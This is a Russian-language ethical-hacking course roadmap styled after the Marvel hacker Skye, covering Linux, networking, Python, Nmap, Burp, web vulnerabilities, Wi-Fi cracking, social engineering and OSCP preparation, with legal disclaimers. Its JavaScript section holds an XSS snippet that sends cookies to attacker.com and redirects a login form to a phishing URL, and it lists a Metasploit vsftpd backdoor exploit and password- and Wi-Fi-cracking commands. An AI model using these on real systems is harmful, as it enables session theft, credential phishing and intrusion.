SKYE://ACADEMY
0%
Плейсхолдер: Арт/фото Скай за ноутбуком

Академия Скай

Стань как Дейзи Джонсон

От фургона до уровня агента Щ.И.Т. за 12–24 месяца. Полный путь от новичка до профессионала в мире этичного хакинга.

>500
Лабораторий
7
Основных этапов
1
Цель: OSCP

Важное предупреждение об этике!

Весь материал на этом сайте предназначен исключительно для образовательных целей в рамках этичного хакинга. Любые попытки применить полученные знания на реальных системах без явного письменного разрешения владельца являются незаконными и уголовно наказуемыми (ст. 272-274 УК РФ и аналогичные законы в других странах). Мы поддерживаем платформы для легального поиска уязвимостей, такие как HackerOne и Bugcrowd.

Модуль 0: Подготовка

Время: ~1 неделя. Заложи фундамент своего будущего.

Шаг 1: Оборудование и Софт

Тебе не нужен суперкомпьютер. Подойдет любой ноутбук или ПК с минимум 8 ГБ оперативной памяти и 50 ГБ свободного места на диске.

Что нужно установить:

Пошаговая установка Kali Linux в VirtualBox:

  1. Скачайте и установите VirtualBox.
  2. Скачайте образ Kali Linux для VirtualBox (.ova файл).
  3. В VirtualBox выберите "Файл" -> "Импорт конфигурации".
  4. Выберите скачанный .ova файл и следуйте инструкциям. Не меняйте настройки, если не уверены.
  5. После импорта выберите машину Kali в списке и нажмите "Запустить". Логин по умолчанию: kali, пароль: kali.

Шаг 2: Создание Аккаунтов

Это твои будущие полигоны. Зарегистрируйся на всех платформах. Используй менеджер паролей (напр. Bitwarden).

"Я никогда не хотела вписываться. Зачем быть винтиком в машине, если можно быть той, кто ее разбирает?" — Скай, размышляя о своем пути

Шаг 3: Первая Команда

Запусти свою Kali Linux. Открой терминал (иконка черного экрана). Поздравляю, ты в "командном центре". Введи эту команду и нажми Enter:

whoami

Система ответит kali. Это твое имя пользователя. Теперь попробуй:

ls -la /

Эта команда показывает все файлы и папки в корневой директории твоей системы. Ты только что заглянул в самое сердце Linux.

Плейсхолдер: Скриншот терминала Kali с выводом команды `ls -la /`

Чек-лист Модуля 0

Модуль 1: Основы (Linux + Сети)

Время: 1.5-2 месяца. Научись говорить на языке машин и сетей.

Дисклеймер

Изучение сетевых инструментов, таких как Wireshark, на публичных или корпоративных сетях без разрешения может быть нарушением политики использования. Практикуйтесь в своей изолированной виртуальной среде.

Часть 1: Властелин Командной Строки

Linux — твоя операционная система. Терминал — твой главный инструмент. Ты должен чувствовать себя в нем как дома, быстрее и эффективнее, чем в любом графическом интерфейсе. На это уйдет время, но результат того стоит.

Урок 1.1: Навигация и Осмотр

Прежде чем атаковать, нужно уметь ориентироваться.


# pwd (print working directory) - где я?
pwd

# ls -la (list all, long format) - что вокруг меня?
ls -la

# cd /var/www/html (change directory) - иду туда
cd /var/www/html
                            

Задача: Перейдите в директорию /etc, посмотрите ее содержимое, затем вернитесь в домашнюю директорию одной командой (cd без аргументов).

Урок 1.2: Работа с Файлами и Потоками

Создание, чтение, перенаправление. Данные текут туда, куда ты укажешь.


# cat /etc/passwd - прочитать файл
cat /etc/passwd

# cat /etc/passwd | grep 'root' - прочитать файл и найти строку с 'root'
# | (pipe) - это конвейер, он передает вывод одной команды на вход другой

# echo "Hello, Skye" > hello.txt - записать строку в файл (перезаписать)
echo "Hello, Skye" > hello.txt

# echo "New line" >> hello.txt - добавить строку в конец файла (дописать)
echo "New line" >> hello.txt
                            

Задача: Найдите всех пользователей с оболочкой /bin/bash в файле /etc/passwd и запишите их имена в файл users.txt.

Урок 1.3: Поиск и Фильтрация

Иголки в стоге сена? Не проблема.


# find / -name "secret.txt" - найти файл 'secret.txt' во всей системе
# 2>/dev/null - подавить вывод ошибок (например, "Permission denied")

# grep -r "password" /etc - рекурсивно найти слово "password" во всех файлах в /etc

# locate *.conf - быстро найти все файлы, заканчивающиеся на .conf (использует базу данных)
                            

Задача: Найдите все файлы с расширением .log в директории /var/log, которые были изменены за последние 24 часа.

Урок 1.4: Права Доступа

Кто может читать, писать и исполнять? Основа безопасности Linux.

-rwxr-xr--: -(файл) rwx(владелец) r-x(группа) r--(остальные)


# chmod 744 script.sh - дать права rwx владельцу, r-- группе и остальным
# 7 (rwx) = 4(r)+2(w)+1(x)
# 4 (r--) = 4(r)+0(w)+0(x)

# chown skye:skye file.txt - сменить владельца и группу файла на 'skye'
                            

Задача: Создайте файл, сделайте его исполняемым только для себя. Попробуйте запустить его от имени другого пользователя (если есть).

Плейсхолдер: Гифка/скриншот, где Скай сидит в своем фургоне, окруженная экранами с кодом.
"Люди думают, что хакинг — это магия. Нет, это просто терпение. Терпение, чтобы найти одну маленькую ошибку в миллионах строк идеального кода." — Скай, объясняя свою философию

Часть 2: Архитектура Сети

Информация перемещается по сети в виде пакетов. Твоя задача — научиться их читать, перехватывать и понимать, как они путешествуют от точки А к точке Б.

Урок 2.1: Модель TCP/IP

Это фундамент. Ты должен понимать, что происходит на каждом уровне.

Уровень Название Роль Протоколы
4 Прикладной Данные для приложений HTTP, FTP, DNS, SMTP
3 Транспортный Передача данных (порт-в-порт) TCP, UDP
2 Сетевой Маршрутизация пакетов (IP-адреса) IP, ICMP
1 Канальный Физическая передача (MAC-адреса) Ethernet, Wi-Fi

Урок 2.2: TCP vs UDP

Два брата: один надежный, другой быстрый.

  • TCP (Transmission Control Protocol): Надежный. Гарантирует доставку пакетов в правильном порядке. Использует "трехстороннее рукопожатие" (SYN, SYN-ACK, ACK) для установки соединения. Используется для HTTP, FTP, SSH.
  • UDP (User Datagram Protocol): Быстрый. Отправляет пакеты и не заботится, дошли ли они. Нет установки соединения. Используется для DNS, видеостриминга, онлайн-игр.

Урок 2.3: Wireshark — Твой Сетевой Микроскоп

Установи Wireshark (sudo apt update && sudo apt install wireshark). Запусти и начни слушать трафик на своем интерфейсе. Это окно в душу сети.

Полезные фильтры:

# Показать трафик только от/к этому IP
ip.addr == 8.8.8.8

# Показать только DNS-запросы
dns

# Показать только HTTP GET запросы
http.request.method == "GET"

# Показать пакеты, содержащие слово "password" (может не работать с HTTPS)
tcp contains "password"
                            

Задача: Откройте сайт http://example.com (не https!). В Wireshark отфильтруйте HTTP трафик. Найдите GET-запрос от вашего компьютера и ответ от сервера.

Практические Задания и Ресурсы (Цели на 1.5-2 месяца)

Не читай, а делай. Твои цели на этот модуль:

Linux:
Сети:

Тест: Модуль 1

Какой протокол транспортного уровня используется для DNS-запросов из-за его скорости?

TCP
UDP
HTTP

Модуль 2: Программирование для Хакера

Время: 2-3 месяца. Автоматизируй всё. Пиши скрипты, которые работают, пока ты спишь.

Часть 1: Python — Твой Швейцарский Нож

Python — главный язык в кибербезопасности. Он простой, мощный и имеет огромное количество библиотек. Ты будешь использовать его для всего: от сканирования сетей до написания эксплойтов.

Урок 2.1: Разведка с `requests`

Библиотека `requests` позволяет отправлять HTTP-запросы так же легко, как это делает браузер. Это основа для парсинга сайтов и тестирования API.


import requests

# Простой GET-запрос
try:
    response = requests.get("https://example.com")
    print(f"Статус-код: {response.status_code}")
    # print(response.text) # Выведет HTML-код страницы
except requests.exceptions.RequestException as e:
    print(f"Ошибка: {e}")

# POST-запрос с данными
data_to_send = {'login': 'skye', 'password': 'bad_password'}
response = requests.post("https://some-vuln-site.com/login", data=data_to_send)
                            

Задача: Напишите скрипт, который принимает на вход URL и выводит заголовки ответа сервера (например, `Server`, `Content-Type`).

Урок 2.2: Сканер портов с `socket`

Библиотека `socket` — это низкоуровневый интерфейс для работы с сетью. С ее помощью можно взаимодействовать с любыми TCP/UDP сервисами.

Это улучшенная версия сканера из обзора. Она использует `sys` для чтения аргументов из командной строки.


import socket
import sys

def scan_port(ip, port):
    try:
        # Создаем новый сокет
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Устанавливаем таймаут, чтобы не ждать вечно
        sock.settimeout(0.5)
        # Пытаемся подключиться
        if sock.connect_ex((ip, port)) == 0:
            print(f"[+] Порт {port}: Открыт")
        sock.close()
    except (socket.error, socket.timeout) as e:
        pass # Игнорируем ошибки для чистоты вывода

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Использование: python scanner.py ")
        sys.exit()
    
    target_ip = sys.argv[1]
    print(f"Сканирую {target_ip}...")

    # Сканируем первые 1024 порта
    for p in range(1, 1025):
        scan_port(target_ip, p)
                             

Задача: Модифицируйте скрипт, чтобы он принимал диапазон портов для сканирования (например, `python scanner.py 1-100`).

Часть 2: Bash и JavaScript

Bash-скриптинг для автоматизации

Bash — это клей, который соединяет все твои инструменты в Linux. Простой цикл может сэкономить часы ручной работы.

Пример: Скрипт для поиска живых хостов в подсети и их сканирования с помощью Nmap.


#!/bin/bash

# Проверяем, что передан аргумент
if [ -z "$1" ]; then
  echo "Использование: $0 <подсеть, например, 192.168.1>"
  exit 1
fi

PREFIX=$1
for i in {1..254}; do
  IP="${PREFIX}.${i}"
  # Пингуем хост один раз, без вывода
  ping -c 1 $IP | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
wait
echo "Сканирование завершено."
# Теперь можно передать живые хосты в nmap
# nmap -iL live_hosts.txt
                            

JavaScript для веб-хакинга

Понимание JS необходимо для поиска XSS-уязвимостей. Тебе нужно знать, как работает DOM (Document Object Model) и как его можно манипулировать. Начни с консоли разработчика в браузере (F12).


// Классический alert, доказывающий XSS
alert('XSS PoC');

// Более коварный вариант: кража cookie
// Если на сайте нет защиты HttpOnly, этот код отправит cookie атакующему
var img = document.createElement('img');
img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
document.body.appendChild(img);

// Манипуляция DOM: замена формы входа
document.querySelector('form').action = 'http://attacker.com/login_phish';
                             

Задача: На любом сайте откройте консоль разработчика и попробуйте изменить заголовок страницы командой `document.title = "I am Skye";`.

Практические Ресурсы

Код пишется пальцами, а не чтением.

Модуль 3: Ключевые инструменты

Время: 1.5-2 месяца. Арсенал современного хакера.

"Инструменты не делают хакера, но хороший хакер знает свои инструменты до последнего байта." — Мысль, которая могла бы принадлежать Скай

Урок 3.1: Nmap — Карта Сети

Nmap (Network Mapper) — твои глаза и уши в любой сети. Это не просто сканер портов, это мощный инструмент для разведки, который может определить ОС, запущенные службы и даже найти уязвимости с помощью скриптов.

Основные Сканирования:


# Пинг-сканирование: найти живые хосты в сети, не сканируя порты
nmap -sn 192.168.1.0/24

# SYN-сканирование (Stealth Scan): быстрое и незаметное
sudo nmap -sS 192.168.1.10

# Определение версий служб и ОС
sudo nmap -sV -O 192.168.1.10

# Агрессивное сканирование: включает определение ОС (-O), версий (-sV), скриптовое сканирование (-sC) и трассировку (traceroute)
sudo nmap -A -T4 192.168.1.10
                        

Nmap Scripting Engine (NSE):

Сердце Nmap. Это скрипты на Lua, которые автоматизируют поиск уязвимостей.


# Запустить стандартный набор скриптов
sudo nmap -sC 192.168.1.10

# Искать HTTP-уязвимости
sudo nmap --script "http-*" -p 80 192.168.1.10
                        

Урок 3.2: Burp Suite — Манипуляция Вебом

Burp Suite — это швейцарский нож для веб-пентеста. В бесплатной Community Edition тебе доступны ключевые инструменты.

  • Proxy: Ядро Burp. Настрой свой браузер для работы через прокси Burp (127.0.0.1:8080). Теперь ты видишь абсолютно все запросы, которые браузер отправляет на сервер, и можешь их изменять.
  • Repeater: Позволяет взять любой запрос, изменить в нем что угодно (параметры, заголовки, cookie) и отправить повторно, чтобы посмотреть на реакцию сервера. Идеально для ручного тестирования уязвимостей.
  • Intruder: Инструмент для автоматизации атак. Используется для брутфорса паролей, фаззинга параметров или перебора идентификаторов (IDOR).

Урок 3.3: Остальной Арсенал

Gobuster / ffuf — Поиск Скрытого

Эти инструменты ищут скрытые директории и файлы на веб-сервере, перебирая их имена по словарю.

gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hashcat / John the Ripper — Взлом Паролей

Если ты нашел хэш пароля в базе данных, эти инструменты попытаются его вскрыть.

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Metasploit Framework

Огромная база эксплойтов. Если Nmap нашел уязвимую службу, велика вероятность, что в Metasploit уже есть готовый модуль для ее эксплуатации.


msfconsole
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.10
exploit
                                

Практические Задания Модуля 3

Модуль 4: Веб-уязвимости

Время: 3-5 месяцев. Самый большой и важный блок. 90% хакинга сегодня — это веб.

"Каждый сайт — это город со своими секретными проходами. Большинство людей ходят по главным улицам. Я ищу задние двери." — Скай

Урок 4.1: Мышление веб-хакера и OWASP Top 10

Твоя цель — не просто найти уязвимость, а понять логику приложения и найти в ней изъян. OWASP Top 10 — это твой путеводитель по самым частым ошибкам разработчиков.

  1. A01:2021-Broken Access Control — Нарушение контроля доступа. Могу ли я, будучи обычным юзером, получить доступ к админ-панели, поменяв ID в URL? (/user/123 -> /admin/1)
  2. A02:2021-Cryptographic Failures — Криптографические провалы. Хранятся ли пароли в базе данных в открытом виде? Используется ли слабое шифрование?
  3. A03:2021-Injection — Внедрение. Самый известный представитель — SQL-инъекция. Что если в поле для ввода имени я вставлю часть SQL-запроса?
  4. A04:2021-Insecure Design — Небезопасный дизайн. Фундаментальные ошибки в логике приложения.
  5. A05:2021-Security Misconfiguration — Небезопасная конфигурация. Оставленные по умолчанию пароли, включенный режим отладки, облачные хранилища с публичным доступом.
  6. A06:2021-Vulnerable and Outdated Components — Уязвимые и устаревшие компоненты. Использует ли сайт старую версию WordPress или jQuery с известными уязвимостями?
  7. A07:2021-Identification and Authentication Failures — Ошибки идентификации и аутентификации. Можно ли обойти вход в систему? Легко ли подобрать пароль?
  8. A08:2021-Software and Data Integrity Failures — Нарушения целостности ПО и данных. Например, десериализация небезопасных данных.
  9. A09:2021-Security Logging and Monitoring Failures — Недостатки логирования и мониторинга. Как долго система не замечает, что ее атакуют?
  10. A10:2021-Server-Side Request Forgery (SSRF) — Подделка запросов на стороне сервера. Могу ли я заставить сервер приложения обратиться к внутренним ресурсам, к которым у меня нет доступа напрямую?

Урок 4.2: Практика — PortSwigger Web Security Academy

Это твой основной ресурс на ближайшие месяцы. Твоя задача — пройти ВСЕ бесплатные лаборатории. Это более 200 практических заданий, которые сделают из тебя настоящего веб-хакера. Не торопись, вникай в каждую.

Путь обучения:

Этап 1: SQL Injection
Этап 2: Cross-Site Scripting (XSS)
Этап 3: Контроль доступа и другие уязвимости

Модуль 5: Сети, Wi-Fi и Social Engineering

Время: 2-3 месяца. Атака выходит за пределы веба.

"Дело не в том, что ты взламываешь, а в том, кого ты взламываешь. Люди — самая предсказуемая и одновременно самая непредсказуемая система." — Скай, готовясь к OSINT-операции

Урок 5.1: OSINT — Искусство Знать Всё

Open-Source Intelligence (OSINT) — это сбор и анализ информации из публично доступных источников. Прежде чем прикоснуться к цели, ты должен знать о ней всё: технологии, сотрудников, email-адреса, поддомены.

Инструменты для OSINT:

  • theHarvester: Собирает email'ы, поддомены, имена сотрудников из разных источников (Google, Bing, LinkedIn).
    theharvester -d example.com -b google,linkedin
  • Maltego: Мощный инструмент для визуализации связей. Помогает строить графы отношений между доменами, людьми, email и компаниями.
  • Recon-ng: Фреймворк для OSINT-разведки, похожий на Metasploit. Имеет модульную структуру для сбора информации.
  • Shodan: Поисковик по "Интернету вещей". Ищет не сайты, а устройства: веб-камеры, роутеры, промышленные контроллеры.

Урок 5.2: Социальная Инженерия — Взлом Человека

Самая опасная уязвимость в любой системе — это доверие человека. Социальная инженерия — это набор техник для манипуляции людьми с целью заставить их совершить определенные действия (отдать пароль, запустить файл).

Основные техники:

  • Фишинг: Массовая рассылка поддельных писем (например, от имени банка) с целью кражи учетных данных.
  • Целевой фишинг (Spear Phishing): То же самое, но письмо тщательно готовится под конкретного человека или небольшую группу, используя информацию из OSINT.
  • Претекстинг: Создание вымышленного сценария (легенды) для получения информации. Например, звонок в техподдержку от имени сотрудника.

Инструменты: Gophish — фреймворк для проведения фишинговых кампаний. Social-Engineer Toolkit (SET) в Kali Linux.

Урок 5.3: Wi-Fi Hacking

Для атак на Wi-Fi требуется специальный адаптер, поддерживающий режим мониторинга и инъекцию пакетов (например, Alfa AWUS036ACH).

Основной набор инструментов — Aircrack-ng suite.

  1. airmon-ng: Перевод адаптера в режим монитора.
    airmon-ng start wlan0
  2. airodump-ng: Сканирование эфира для обнаружения точек доступа и клиентов.
    airodump-ng wlan0mon
  3. aireplay-ng: Деаутентификация клиентов для перехвата "рукопожатия" (handshake).
  4. aircrack-ng: Взлом перехваченного рукопожатия WPA/WPA2 по словарю.
    aircrack-ng -w /path/to/wordlist.txt capture.cap

Практические Задания Модуля 5

Модуль 6: Продвинутый Уровень + CTF/Red Team

Время: 4-6 месяцев. Переход от студента к профессионалу.

Active Directory & Exploit Development

Большинство корпоративных сетей работают на Active Directory. Научись их атаковать (Kerberoasting, Pass-the-Hash). Изучи основы переполнения буфера (Buffer Overflow) — это классика, которая учит понимать, как работает память компьютера.

Участие в CTF и Bug Bounty

Теория мертва без практики. Начни участвовать в CTF на Hack The Box. Выбери простую программу на HackerOne с широким скоупом и начни искать уязвимости. Даже если ничего не найдешь, ты многому научишься.

Модуль 7: Сертификаты и Карьера

Время: Постоянно. Докажи свои навыки и найди работу мечты.

"Взломать систему — это только начало. Настоящая цель — построить себе будущее, в котором ты сам устанавливаешь правила." — Скай, размышляя о своей независимости

Урок 7.1: Карта Сертификаций

Сертификаты — это не самоцель, а способ доказать рынку, что твои навыки реальны. Они структурируют знания и открывают двери на собеседования.

1. eJPT (eLearnSecurity Junior Penetration Tester)

Твой первый шаг. Полностью практический экзамен, где нужно провести тест на проникновение в небольшой корпоративной сети. Отличная проверка базовых навыков.

2. PenTest+ / CEH (CompTIA / EC-Council)

Более теоретические, но признаются многими компаниями, особенно в корпоративном секторе и госструктурах. Помогают закрепить терминологию и методологии.

3. OSCP (Offensive Security Certified Professional)

Золотой стандарт. 24-часовой практический экзамен, где нужно взломать несколько машин. Девиз — "Try Harder". Наличие OSCP сразу выделяет тебя из толпы. Подготовка к нему — это отдельный марафон на 3-6 месяцев интенсивной практики на площадках вроде Hack The Box и Proving Grounds.

Урок 7.2: Твое Цифровое Портфолио

В мире хакинга твое резюме — это не документ Word. Это совокупность твоих цифровых следов, доказывающих твою страсть и компетентность.

  • Профиль GitHub: Здесь должны быть твои скрипты для автоматизации, модифицированные эксплойты, конспекты. Это показывает, что ты умеешь писать код.
  • Профиль Hack The Box / TryHackMe: Твой ранг и решенные машины говорят сами за себя. Рекрутеры это проверяют.
  • Блог (Medium, GitHub Pages): Пиши райтапы (прохождения) интересных машин с CTF. Это показывает твой образ мыслей и умение объяснять сложные вещи.
  • Профиль HackerOne/Bugcrowd: Даже найденные дубликаты или уязвимости с низким рейтингом — это реальный опыт, который ценится гораздо выше, чем отсутствие опыта.

Задания на Будущее

Ежедневный ритуал Скай

Дисциплина важнее мотивации.

Галерея Мотивации

Вспомни, зачем ты здесь.

Плейсхолдер: Сцена, где Скай взламывает систему Щ.И.Т. из своего фургона

Неповиновение системе

Скай использовала свои навыки, чтобы бросить вызов могущественной организации, веря в свободу информации. Твои навыки — это инструмент перемен.

Плейсхолдер: Сцена, где Скай работает в команде с агентами

От одиночки к командному игроку

Даже самый гениальный хакер сильнее в команде. Она научилась доверять и работать с другими, чтобы достигать больших целей.